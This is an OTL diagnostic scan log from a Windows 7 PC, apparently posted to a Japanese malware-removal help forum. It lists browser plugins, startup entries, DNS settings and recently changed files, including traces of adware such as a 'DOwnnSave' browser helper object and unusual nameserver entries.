FF - HKLM\Software\MozillaPlugins\@pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.28.13\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.28.13\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0: C:\Users\【ユーザー名】\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 40.0.3\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 40.0.3\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins

[2015/09/14 16:41:27 | 000,000,000 | ---D | M] (No name found) -- C:\Users\【ユーザー名】\AppData\Roaming\mozilla\Extensions
[2015/09/14 16:41:07 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2015/09/14 16:41:07 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}

[color=#E56717]========== Chrome ==========[/color]

CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.0_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.7_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb\1.9.1_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.30_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\eablgejicbklomgaiclcolfilbkckngf\1.2.1_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpkfjicglakibpenojifdiepckckakgk\1.13.4_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg\0.3.0.5_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcbpblocgmgfnpjjppndjkmgjaogfceg\0.98.80_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.1.2.0_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\plnacehkknmafkjgkikclamogikoiaaa\1.1_0\

O1 HOSTS File: ([2015/09/13 16:57:37 | 000,000,098 | ---- | M]) - C:\Windows\SysNative\drivers\etc\Hosts
O1 - Hosts: 127.0.0.1 localhost
O1 - Hosts: ::1 localhost
O2:[b]64bit:[/b] - BHO: (DOwnnSave) - {7F6EE392-0640-444B-B105-4FDE528B793E} - C:\Program Files (x86)\DOwnnSave\v6zSk4iGH18oQh.x64.dll File not found
O2:[b]64bit:[/b] - BHO: (Skype Click to Call for Internet Explorer) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O2 - BHO: (Java(tm) Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_60\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (Skype Click to Call for Internet Explorer) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O2 - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_60\bin\jp2ssv.dll (Oracle Corporation)
O4:[b]64bit:[/b] - HKLM..\Run: [ETDCtrl] C:\Program Files\Elantech\ETDCtrl.exe (ELAN Microelectronics Corp.)
O4:[b]64bit:[/b] - HKLM..\Run: [HotKeysCmds] C:\Windows\SysNative\hkcmd.exe (Intel Corporation)
O4:[b]64bit:[/b] - HKLM..\Run: [IgfxTray] C:\Windows\SysNative\igfxtray.exe (Intel Corporation)
O4:[b]64bit:[/b] - HKLM..\Run: [IntelTBRunOnce] wscript.exe //b //nologo "C:\Program Files\Intel\TurboBoost\RunTBGadgetOnce.vbs" File not found
O4:[b]64bit:[/b] - HKLM..\Run: [Launch LCore] C:\Program Files\Logicool Gaming Software\LCore.exe (Logitech Inc.)
O4:[b]64bit:[/b] - HKLM..\Run: [Logitech Download Assistant] C:\Windows\SysNative\LogiLDA.dll (Logitech, Inc.)
O4:[b]64bit:[/b] - HKLM..\Run: [MSC] c:\Program Files\Microsoft Security Client\msseces.exe (Microsoft Corporation)
O4:[b]64bit:[/b] - HKLM..\Run: [Persistence] C:\Windows\SysNative\igfxpers.exe (Intel Corporation)
O4 - HKLM..\Run: [BackupManagerTray] C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe (NTI Corporation)
O4 - HKLM..\Run: [Google Japanese Input Prelauncher] C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe (Google Inc.)
O4 - HKLM..\Run: [LManager] C:\Program Files (x86)\Launch Manager\LManager.exe (Dritek System Inc.)
O4 - HKLM..\Run: [SuiteTray] C:\Program Files (x86)\EgisTec MyWinLockerSuite\x86\SuiteTray.exe (Egis Technology Inc.)
O4 - HKU\S-1-5-19..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation)
O4 - HKU\S-1-5-20..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation)
O4 - HKU\S-1-5-21-2268393351-900118556-74167924-1000..\Run: [CCleaner Monitoring] C:\Program Files\CCleaner\CCleaner64.exe (Piriform Ltd)
O4 - HKU\S-1-5-21-2268393351-900118556-74167924-1000..\Run: [Dropbox Update] C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe (Dropbox, Inc.)
O4 - HKU\S-1-5-19..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O4 - HKU\S-1-5-20..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O4 - Startup: C:\Users\【ユーザー名】\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk = C:\Users\【ユーザー名】\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O9:[b]64bit:[/b] - Extra Button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O9 - Extra Button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - NameSpace_Catalog5\Catalog_Entries64\000000000009 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000009 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)
O13[b]64bit:[/b] - gopher Prefix: missing
O13 - gopher Prefix: missing
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: DhcpNameServer = 192.168.50.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{5079169B-AD83-42A3-B1B3-C04B8C96D5A8}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{C678E09F-B902-4D1E-87D2-AE9B8DCDE689}: NameServer = 192.168.50.1
O18:[b]64bit:[/b] - Protocol\Handler\livecall - No CLSID value found
O18:[b]64bit:[/b] - Protocol\Handler\msnim - No CLSID value found
O18:[b]64bit:[/b] - Protocol\Handler\skypec2c {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O18:[b]64bit:[/b] - Protocol\Handler\wlmailhtml - No CLSID value found
O18:[b]64bit:[/b] - Protocol\Handler\wlpg - No CLSID value found
O18 - Protocol\Handler\skypec2c {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O20:[b]64bit:[/b] - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:[b]64bit:[/b] - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysWow64\userinit.exe (Microsoft Corporation)
O20:[b]64bit:[/b] - Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\Windows\SysNative\igfxdev.dll (Intel Corporation)
O21:[b]64bit:[/b] - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O33 - MountPoints2\{2558c854-d459-11e3-a87a-208984cf2c64}\Shell - "" = AutoRun
O33 - MountPoints2\{2558c854-d459-11e3-a87a-208984cf2c64}\Shell\AutoRun\command - "" = E:\setup.exe
O33 - MountPoints2\{37963c8e-b209-11e4-9d99-208984cf2c64}\Shell - "" = AutoRun
O33 - MountPoints2\{37963c8e-b209-11e4-9d99-208984cf2c64}\Shell\AutoRun\command - "" = E:\setup.exe
O33 - MountPoints2\{617f691c-d6a3-11e3-b617-208984cf2c64}\Shell - "" = AutoRun
O33 - MountPoints2\{617f691c-d6a3-11e3-b617-208984cf2c64}\Shell\AutoRun\command - "" = E:\setup.exe
O33 - MountPoints2\{abdeda0d-d52d-11e3-b8ba-208984cf2c64}\Shell - "" = AutoRun
O33 - MountPoints2\{abdeda0d-d52d-11e3-b8ba-208984cf2c64}\Shell\AutoRun\command - "" = E:\setup.exe
O34 - HKLM BootExecute: (autocheck autochk *)
O35:[b]64bit:[/b] - HKLM\..comfile [open] -- "%1" %*
O35:[b]64bit:[/b] - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:[b]64bit:[/b] - HKLM\...com [@ = comfile] -- "%1" %*
O37:[b]64bit:[/b] - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)

ActiveX:[b]64bit:[/b] {12d0ed0d-0ee0-4f90-8827-78cefb8f4988} - C:\Windows\system32\ieudinit.exe
ActiveX:[b]64bit:[/b] {1AD147D0-BE0E-3D6C-AC11-64F6DC4163F1} - .NET Framework
ActiveX:[b]64bit:[/b] {22d6f312-b0f6-11d0-94ab-0080c74c7e95} - Microsoft Windows Media Player 12.0
ActiveX:[b]64bit:[/b] {26784146-6E05-3FF9-9335-786C7C0FB5BE} - .NET Framework
ActiveX:[b]64bit:[/b] {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - %SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll
ActiveX:[b]64bit:[/b] {2D46B6DC-2207-486B-B523-A557E6D54B47} - C:\Windows\system32\cmd.exe /D /C start C:\Windows\system32\ie4uinit.exe -ClearIconCache
ActiveX:[b]64bit:[/b] {3af36230-a269-11d1-b5bf-0000f8051515} - Offline Browsing Pack
ActiveX:[b]64bit:[/b] {44BBA840-CC51-11CF-AAFA-00AA00B6015C} - "%ProgramFiles%\Windows Mail\WinMail.exe" OCInstallUserConfigOE
ActiveX:[b]64bit:[/b] {44BBA855-CC51-11CF-AAFA-00AA00B6015F} - DirectDrawEx
ActiveX:[b]64bit:[/b] {45ea75a0-a269-11d1-b5bf-0000f8051515} - Internet Explorer Help
ActiveX:[b]64bit:[/b] {4f645220-306d-11d2-995d-00c04f98bbc9} - Microsoft Windows Script 5.6
ActiveX:[b]64bit:[/b] {5fd399c0-a70a-11d1-9948-00c04f98bbc9} - Internet Explorer Setup Tools
ActiveX:[b]64bit:[/b] {630b1da0-b465-11d1-9948-00c04f98bbc9} - Browsing Enhancements
ActiveX:[b]64bit:[/b] {6BF52A52-394A-11d3-B153-00C04F79FAA6} - Microsoft Windows Media Player
ActiveX:[b]64bit:[/b] {6fab99d0-bab8-11d1-994a-00c04f98bbc9} - MSN Site Access
ActiveX:[b]64bit:[/b] {7790769C-0471-11d2-AF11-00C04FA35D02} - Address Book 7
ActiveX:[b]64bit:[/b] {7DEBE4EB-6B40-3766-BB35-5CBBC385DA37} - .NET Framework
ActiveX:[b]64bit:[/b] {89820200-ECBD-11cf-8B85-00AA005B4340} - regsvr32.exe /s /n /i:U shell32.dll
ActiveX:[b]64bit:[/b] {89820200-ECBD-11cf-8B85-00AA005B4383} - C:\Windows\System32\ie4uinit.exe -BaseSettings
ActiveX:[b]64bit:[/b] {89B4C1CD-B018-4511-B0A1-5476DBF70820} - C:\Windows\system32\Rundll32.exe C:\Windows\system32\mscories.dll,Install
ActiveX:[b]64bit:[/b] {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.85\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
ActiveX:[b]64bit:[/b] {9381D8F2-0288-11D0-9501-00AA00B911A5} - Dynamic HTML Data Binding
ActiveX:[b]64bit:[/b] {C9E9A340-D1F1-11D0-821E-444553540600} - Internet Explorer Core Fonts
ActiveX:[b]64bit:[/b] {de5aed00-a4bf-11d1-9948-00c04f98bbc9} - HTML Help
ActiveX:[b]64bit:[/b] {E92B03AB-B707-11d2-9CBD-0000F87A369E} - Active Directory Service Interface
ActiveX:[b]64bit:[/b] {FEBEF00C-046D-438D-8A88-BF94A6C9E703} - .NET Framework
ActiveX:[b]64bit:[/b] >{22d6f312-b0f6-11d0-94ab-0080c74c7e95} - %SystemRoot%\system32\unregmp2.exe /ShowWMP
ActiveX:[b]64bit:[/b] >{26923b43-4d38-484f-9b9e-de460746276c} - C:\Windows\System32\ie4uinit.exe -UserIconConfig
ActiveX:[b]64bit:[/b] >{60B49E34-C7CC-11D0-8953-00A0C90347FF} - "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\iedkcs32.dll",BrandIEActiveSetup SIGNUP
ActiveX: {1AD147D0-BE0E-3D6C-AC11-64F6DC4163F1} - .NET Framework
ActiveX: {22d6f312-b0f6-11d0-94ab-0080c74c7e95} - Microsoft Windows Media Player 12.0
ActiveX: {23A20C3C-2ADD-4A80-AFB4-C146F8847D79} - .NET Framework
ActiveX: {26784146-6E05-3FF9-9335-786C7C0FB5BE} - .NET Framework
ActiveX: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - %SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll
ActiveX: {3af36230-a269-11d1-b5bf-0000f8051515} - Offline Browsing Pack
ActiveX: {44BBA840-CC51-11CF-AAFA-00AA00B6015C} - "%ProgramFiles(x86)%\Windows Mail\WinMail.exe" OCInstallUserConfigOE
ActiveX: {44BBA855-CC51-11CF-AAFA-00AA00B6015F} - DirectDrawEx
ActiveX: {45ea75a0-a269-11d1-b5bf-0000f8051515} - Internet Explorer Help
ActiveX: {4f645220-306d-11d2-995d-00c04f98bbc9} - Microsoft Windows Script 5.6
ActiveX: {5fd399c0-a70a-11d1-9948-00c04f98bbc9} - Internet Explorer Setup Tools
ActiveX: {630b1da0-b465-11d1-9948-00c04f98bbc9} - Browsing Enhancements
ActiveX: {6BF52A52-394A-11d3-B153-00C04F79FAA6} - Microsoft Windows Media Player
ActiveX: {6fab99d0-bab8-11d1-994a-00c04f98bbc9} - MSN Site Access
ActiveX: {7790769C-0471-11d2-AF11-00C04FA35D02} - Address Book 7
ActiveX: {7C028AF8-F614-47B3-82DA-BA94E41B1089} - .NET Framework
ActiveX: {7DEBE4EB-6B40-3766-BB35-5CBBC385DA37} - .NET Framework
ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4340} - regsvr32.exe /s /n /i:U shell32.dll
ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4383} - C:\Windows\SysWOW64\ie4uinit.exe -BaseSettings
ActiveX: {89B4C1CD-B018-4511-B0A1-5476DBF70820} - C:\Windows\SysWOW64\Rundll32.exe C:\Windows\SysWOW64\mscories.dll,Install
ActiveX: {9381D8F2-0288-11D0-9501-00AA00B911A5} - Dynamic HTML Data Binding
ActiveX: {C9E9A340-D1F1-11D0-821E-444553540600} - Internet Explorer Core Fonts
ActiveX: {de5aed00-a4bf-11d1-9948-00c04f98bbc9} - HTML Help
ActiveX: {E92B03AB-B707-11d2-9CBD-0000F87A369E} - Active Directory Service Interface
ActiveX: >{22d6f312-b0f6-11d0-94ab-0080c74c7e95} - %SystemRoot%\system32\unregmp2.exe /ShowWMP
ActiveX: >{26923b43-4d38-484f-9b9e-de460746276c} - C:\Windows\SysWOW64\ie4uinit.exe -UserIconConfig
ActiveX: >{60B49E34-C7CC-11D0-8953-00A0C90347FF} - "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\iedkcs32.dll",BrandIEActiveSetup SIGNUP

CREATERESTOREPOINT
Restore point Set: OTL Restore Point

[color=#E56717]========== Files/Folders - Created Within 30 Days ==========[/color]

[2015/09/14 16:41:16 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\Mozilla
[2015/09/14 16:41:16 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Local\Mozilla
[2015/09/14 16:41:06 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Mozilla Firefox
[2015/09/13 16:43:11 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Mozilla Maintenance Service
[2015/09/13 01:41:08 | 000,000,000 | ---D | C] -- C:\_OTL
[2015/09/12 10:35:26 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\【ユーザー名】\Desktop\OTL.exe
[2015/09/11 09:30:58 | 001,800,104 | ---- | C] (Malwarebytes Corporation) -- C:\Users\【ユーザー名】\Desktop\JRT.exe
[2015/09/10 16:11:43 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\Malwarebytes
[2015/09/10 16:11:10 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes
[2015/09/10 01:22:17 | 000,000,000 | ---D | C] -- C:\Windows\SoftwareDistribution
[2015/09/09 14:52:24 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome アプリ
[2015/09/09 08:39:07 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
[2015/09/09 08:38:43 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Local\Google
[2015/09/09 08:15:35 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\Desktop\chorome
[2015/09/09 06:13:13 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\Desktop\windows_update_fix
[2015/09/08 00:16:43 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\Desktop\hjt・ccログ
[2015/09/07 23:41:07 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\Geek Uninstaller
[2015/09/07 23:40:56 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\Desktop\geek
[2015/09/07 23:23:58 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
[2015/09/07 23:23:57 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\Skype
[2015/09/07 23:10:26 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\Java
[2015/09/07 23:10:14 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\Sun
[2015/09/07 23:10:14 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\.oracle_jre_usage
[2015/09/07 15:01:16 | 000,000,000 | ---D | C] -- C:\7b8eb74e5d1154427c6e2dbc
[2015/09/07 14:46:03 | 000,000,000 | ---D | C] -- C:\Windows\CheckSur
[2015/09/06 16:26:49 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\Windows Live Writer
[2015/09/06 16:26:49 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Local\Windows Live Writer
[2015/09/06 15:56:49 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
[2015/09/06 15:56:39 | 000,000,000 | ---D | C] -- C:\Program Files\CCleaner
[2015/09/06 15:53:36 | 000,000,000 | ---D | C] -- C:\Users\kaito\AppData\Roaming\Super PC Cleaner
[2015/09/06 10:28:10 | 002,241,936 | ---- | C] (Google Inc.) -- C:\Windows\SysNative\GIMEJa.ime
[2015/09/06 10:28:08 | 001,884,560 | ---- | C] (Google Inc.) -- C:\Windows\SysWow64\GIMEJa.ime
[2015/09/04 12:25:28 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
[2015/09/01 11:50:34 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\Desktop\TS
[2015/08/30 09:53:44 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\SeekerFunc
[2015/08/24 19:20:38 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\SystemForce
[2015/08/24 15:09:30 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
[2015/08/24 15:08:32 | 000,000,000 | ---D | C] -- C:\Program Files\iPod
[2015/08/24 15:08:30 | 000,000,000 | ---D | C] -- C:\Program Files\iTunes
[2015/08/24 15:08:30 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\iTunes
[2015/08/24 15:08:30 | 000,000,000 | ---D | C] -- C:\ProgramData\E1864A66-75E3-486a-BD95-D1B7D99A84A7
[2015/08/24 12:37:26 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\TaiG
[2015/08/18 13:56:19 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Microsoft OneDrive
[2015/08/18 13:56:16 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\OneDrive
[2015/08/18 13:55:52 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft OneDrive
[2015/08/18 04:48:00 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\BANDISOFT
[2015/08/18 04:48:00 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\Documents\Bandicam

[color=#E56717]========== Files - Modified Within 30 Days ==========[/color]

[2015/09/14 16:48:05 | 000,000,690 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2015/09/14 16:41:09 | 000,001,147 | ---- | M] () -- C:\Users\Public\Desktop\Mozilla Firefox.lnk
[2015/09/14 16:06:00 | 000,000,626 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2015/09/14 16:02:31 | 000,000,696 | ---- | M] () -- C:\Windows\tasks\DropboxUpdateTaskUserS-1-5-21-2268393351-900118556-74167924-1000UA.job
[2015/09/14 15:48:00 | 000,000,686 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2015/09/14 00:02:00 | 000,000,644 | ---- | M] () -- C:\Windows\tasks\DropboxUpdateTaskUserS-1-5-21-2268393351-900118556-74167924-1000Core.job
[2015/09/13 17:06:52 | 000,024,400 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2015/09/13 17:06:52 | 000,024,400 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2015/09/13 16:58:20 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2015/09/13 16:58:16 | 3094,102,016 | -HS- | M] () -- C:\hiberfil.sys
[2015/09/13 16:57:37 | 000,000,098 | ---- | M] () -- C:\Windows\SysNative\drivers\etc\Hosts
[2015/09/13 16:40:32 | 000,242,808 | ---- | M] () -- C:\Users\【ユーザー名】\Desktop\Firefox Setup Stub 40.0.3.exe
[2015/09/12 10:35:35 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\【ユーザー名】\Desktop\OTL.exe
[2015/09/11 09:31:03 | 001,800,104 | ---- | M] (Malwarebytes Corporation) -- C:\Users\【ユーザー名】\Desktop\JRT.exe
[2015/09/10 01:15:12 | 000,302,011 | ---- | M] () -- C:\Users\【ユーザー名】\Desktop\WindowsUpdateDiagnostic.diagcab
[2015/09/09 15:13:35 | 000,002,606 | ---- | M] () -- C:\Users\【ユーザー名】\Desktop\グランブルーファンタジー[ChromeApps版].lnk
[2015/09/09 08:43:59 | 000,002,265 | ---- | M] () -- C:\Users\【ユーザー名】\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2015/09/09 08:39:07 | 000,002,241 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2015/09/07 23:40:11 | 000,263,472 | ---- | M] () -- C:\Windows\SysNative\FNTCACHE.DAT
[2015/09/07 23:30:54 | 000,001,066 | ---- | M] () -- C:\Users\Public\Desktop\VLC media player.lnk
[2015/09/07 23:23:58 | 000,002,681 | ---- | M] () -- C:\Users\Public\Desktop\Skype.lnk
[2015/09/07 23:09:42 | 000,097,888 | ---- | M] (Oracle Corporation) -- C:\Windows\SysWow64\WindowsAccessBridge-32.dll
[2015/09/07 16:23:07 | 564,744,309 | ---- | M] () -- C:\Users\【ユーザー名】\Desktop\Windows6.1-KB947821-v34-x64.msu
[2015/09/07 13:31:21 | 002,582,815 | ---- | M] () -- C:\Users\【ユーザー名】\Desktop\geek.zip
[2015/09/06 15:56:49 | 000,000,826 | ---- | M] () -- C:\Users\Public\Desktop\CCleaner.lnk
[2015/09/06 10:28:10 | 002,241,936 | ---- | M] (Google Inc.) -- C:\Windows\SysNative\GIMEJa.ime
[2015/09/06 10:28:08 | 001,884,560 | ---- | M] (Google Inc.) -- C:\Windows\SysWow64\GIMEJa.ime
[2015/09/04 12:25:44 | 000,001,139 | ---- | M] () -- C:\Users\【ユーザー名】\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
[2015/08/24 15:09:30 | 000,001,787 | ---- | M] () -- C:\Users\Public\Desktop\iTunes.lnk

[color=#E56717]========== Files Created - No Company Name ==========[/color]

[2015/09/13 16:43:16 | 000,001,159 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
[2015/09/13 16:43:16 | 000,001,147 | ---- | C] () -- C:\Users\Public\Desktop\Mozilla Firefox.lnk
[2015/09/13 16:40:26 | 000,242,808 | ---- | C] () -- C:\Users\【ユーザー名】\Desktop\Firefox Setup Stub 40.0.3.exe
[2015/09/10 01:15:05 | 000,302,011 | ---- | C] () -- C:\Users\【ユーザー名】\Desktop\WindowsUpdateDiagnostic.diagcab
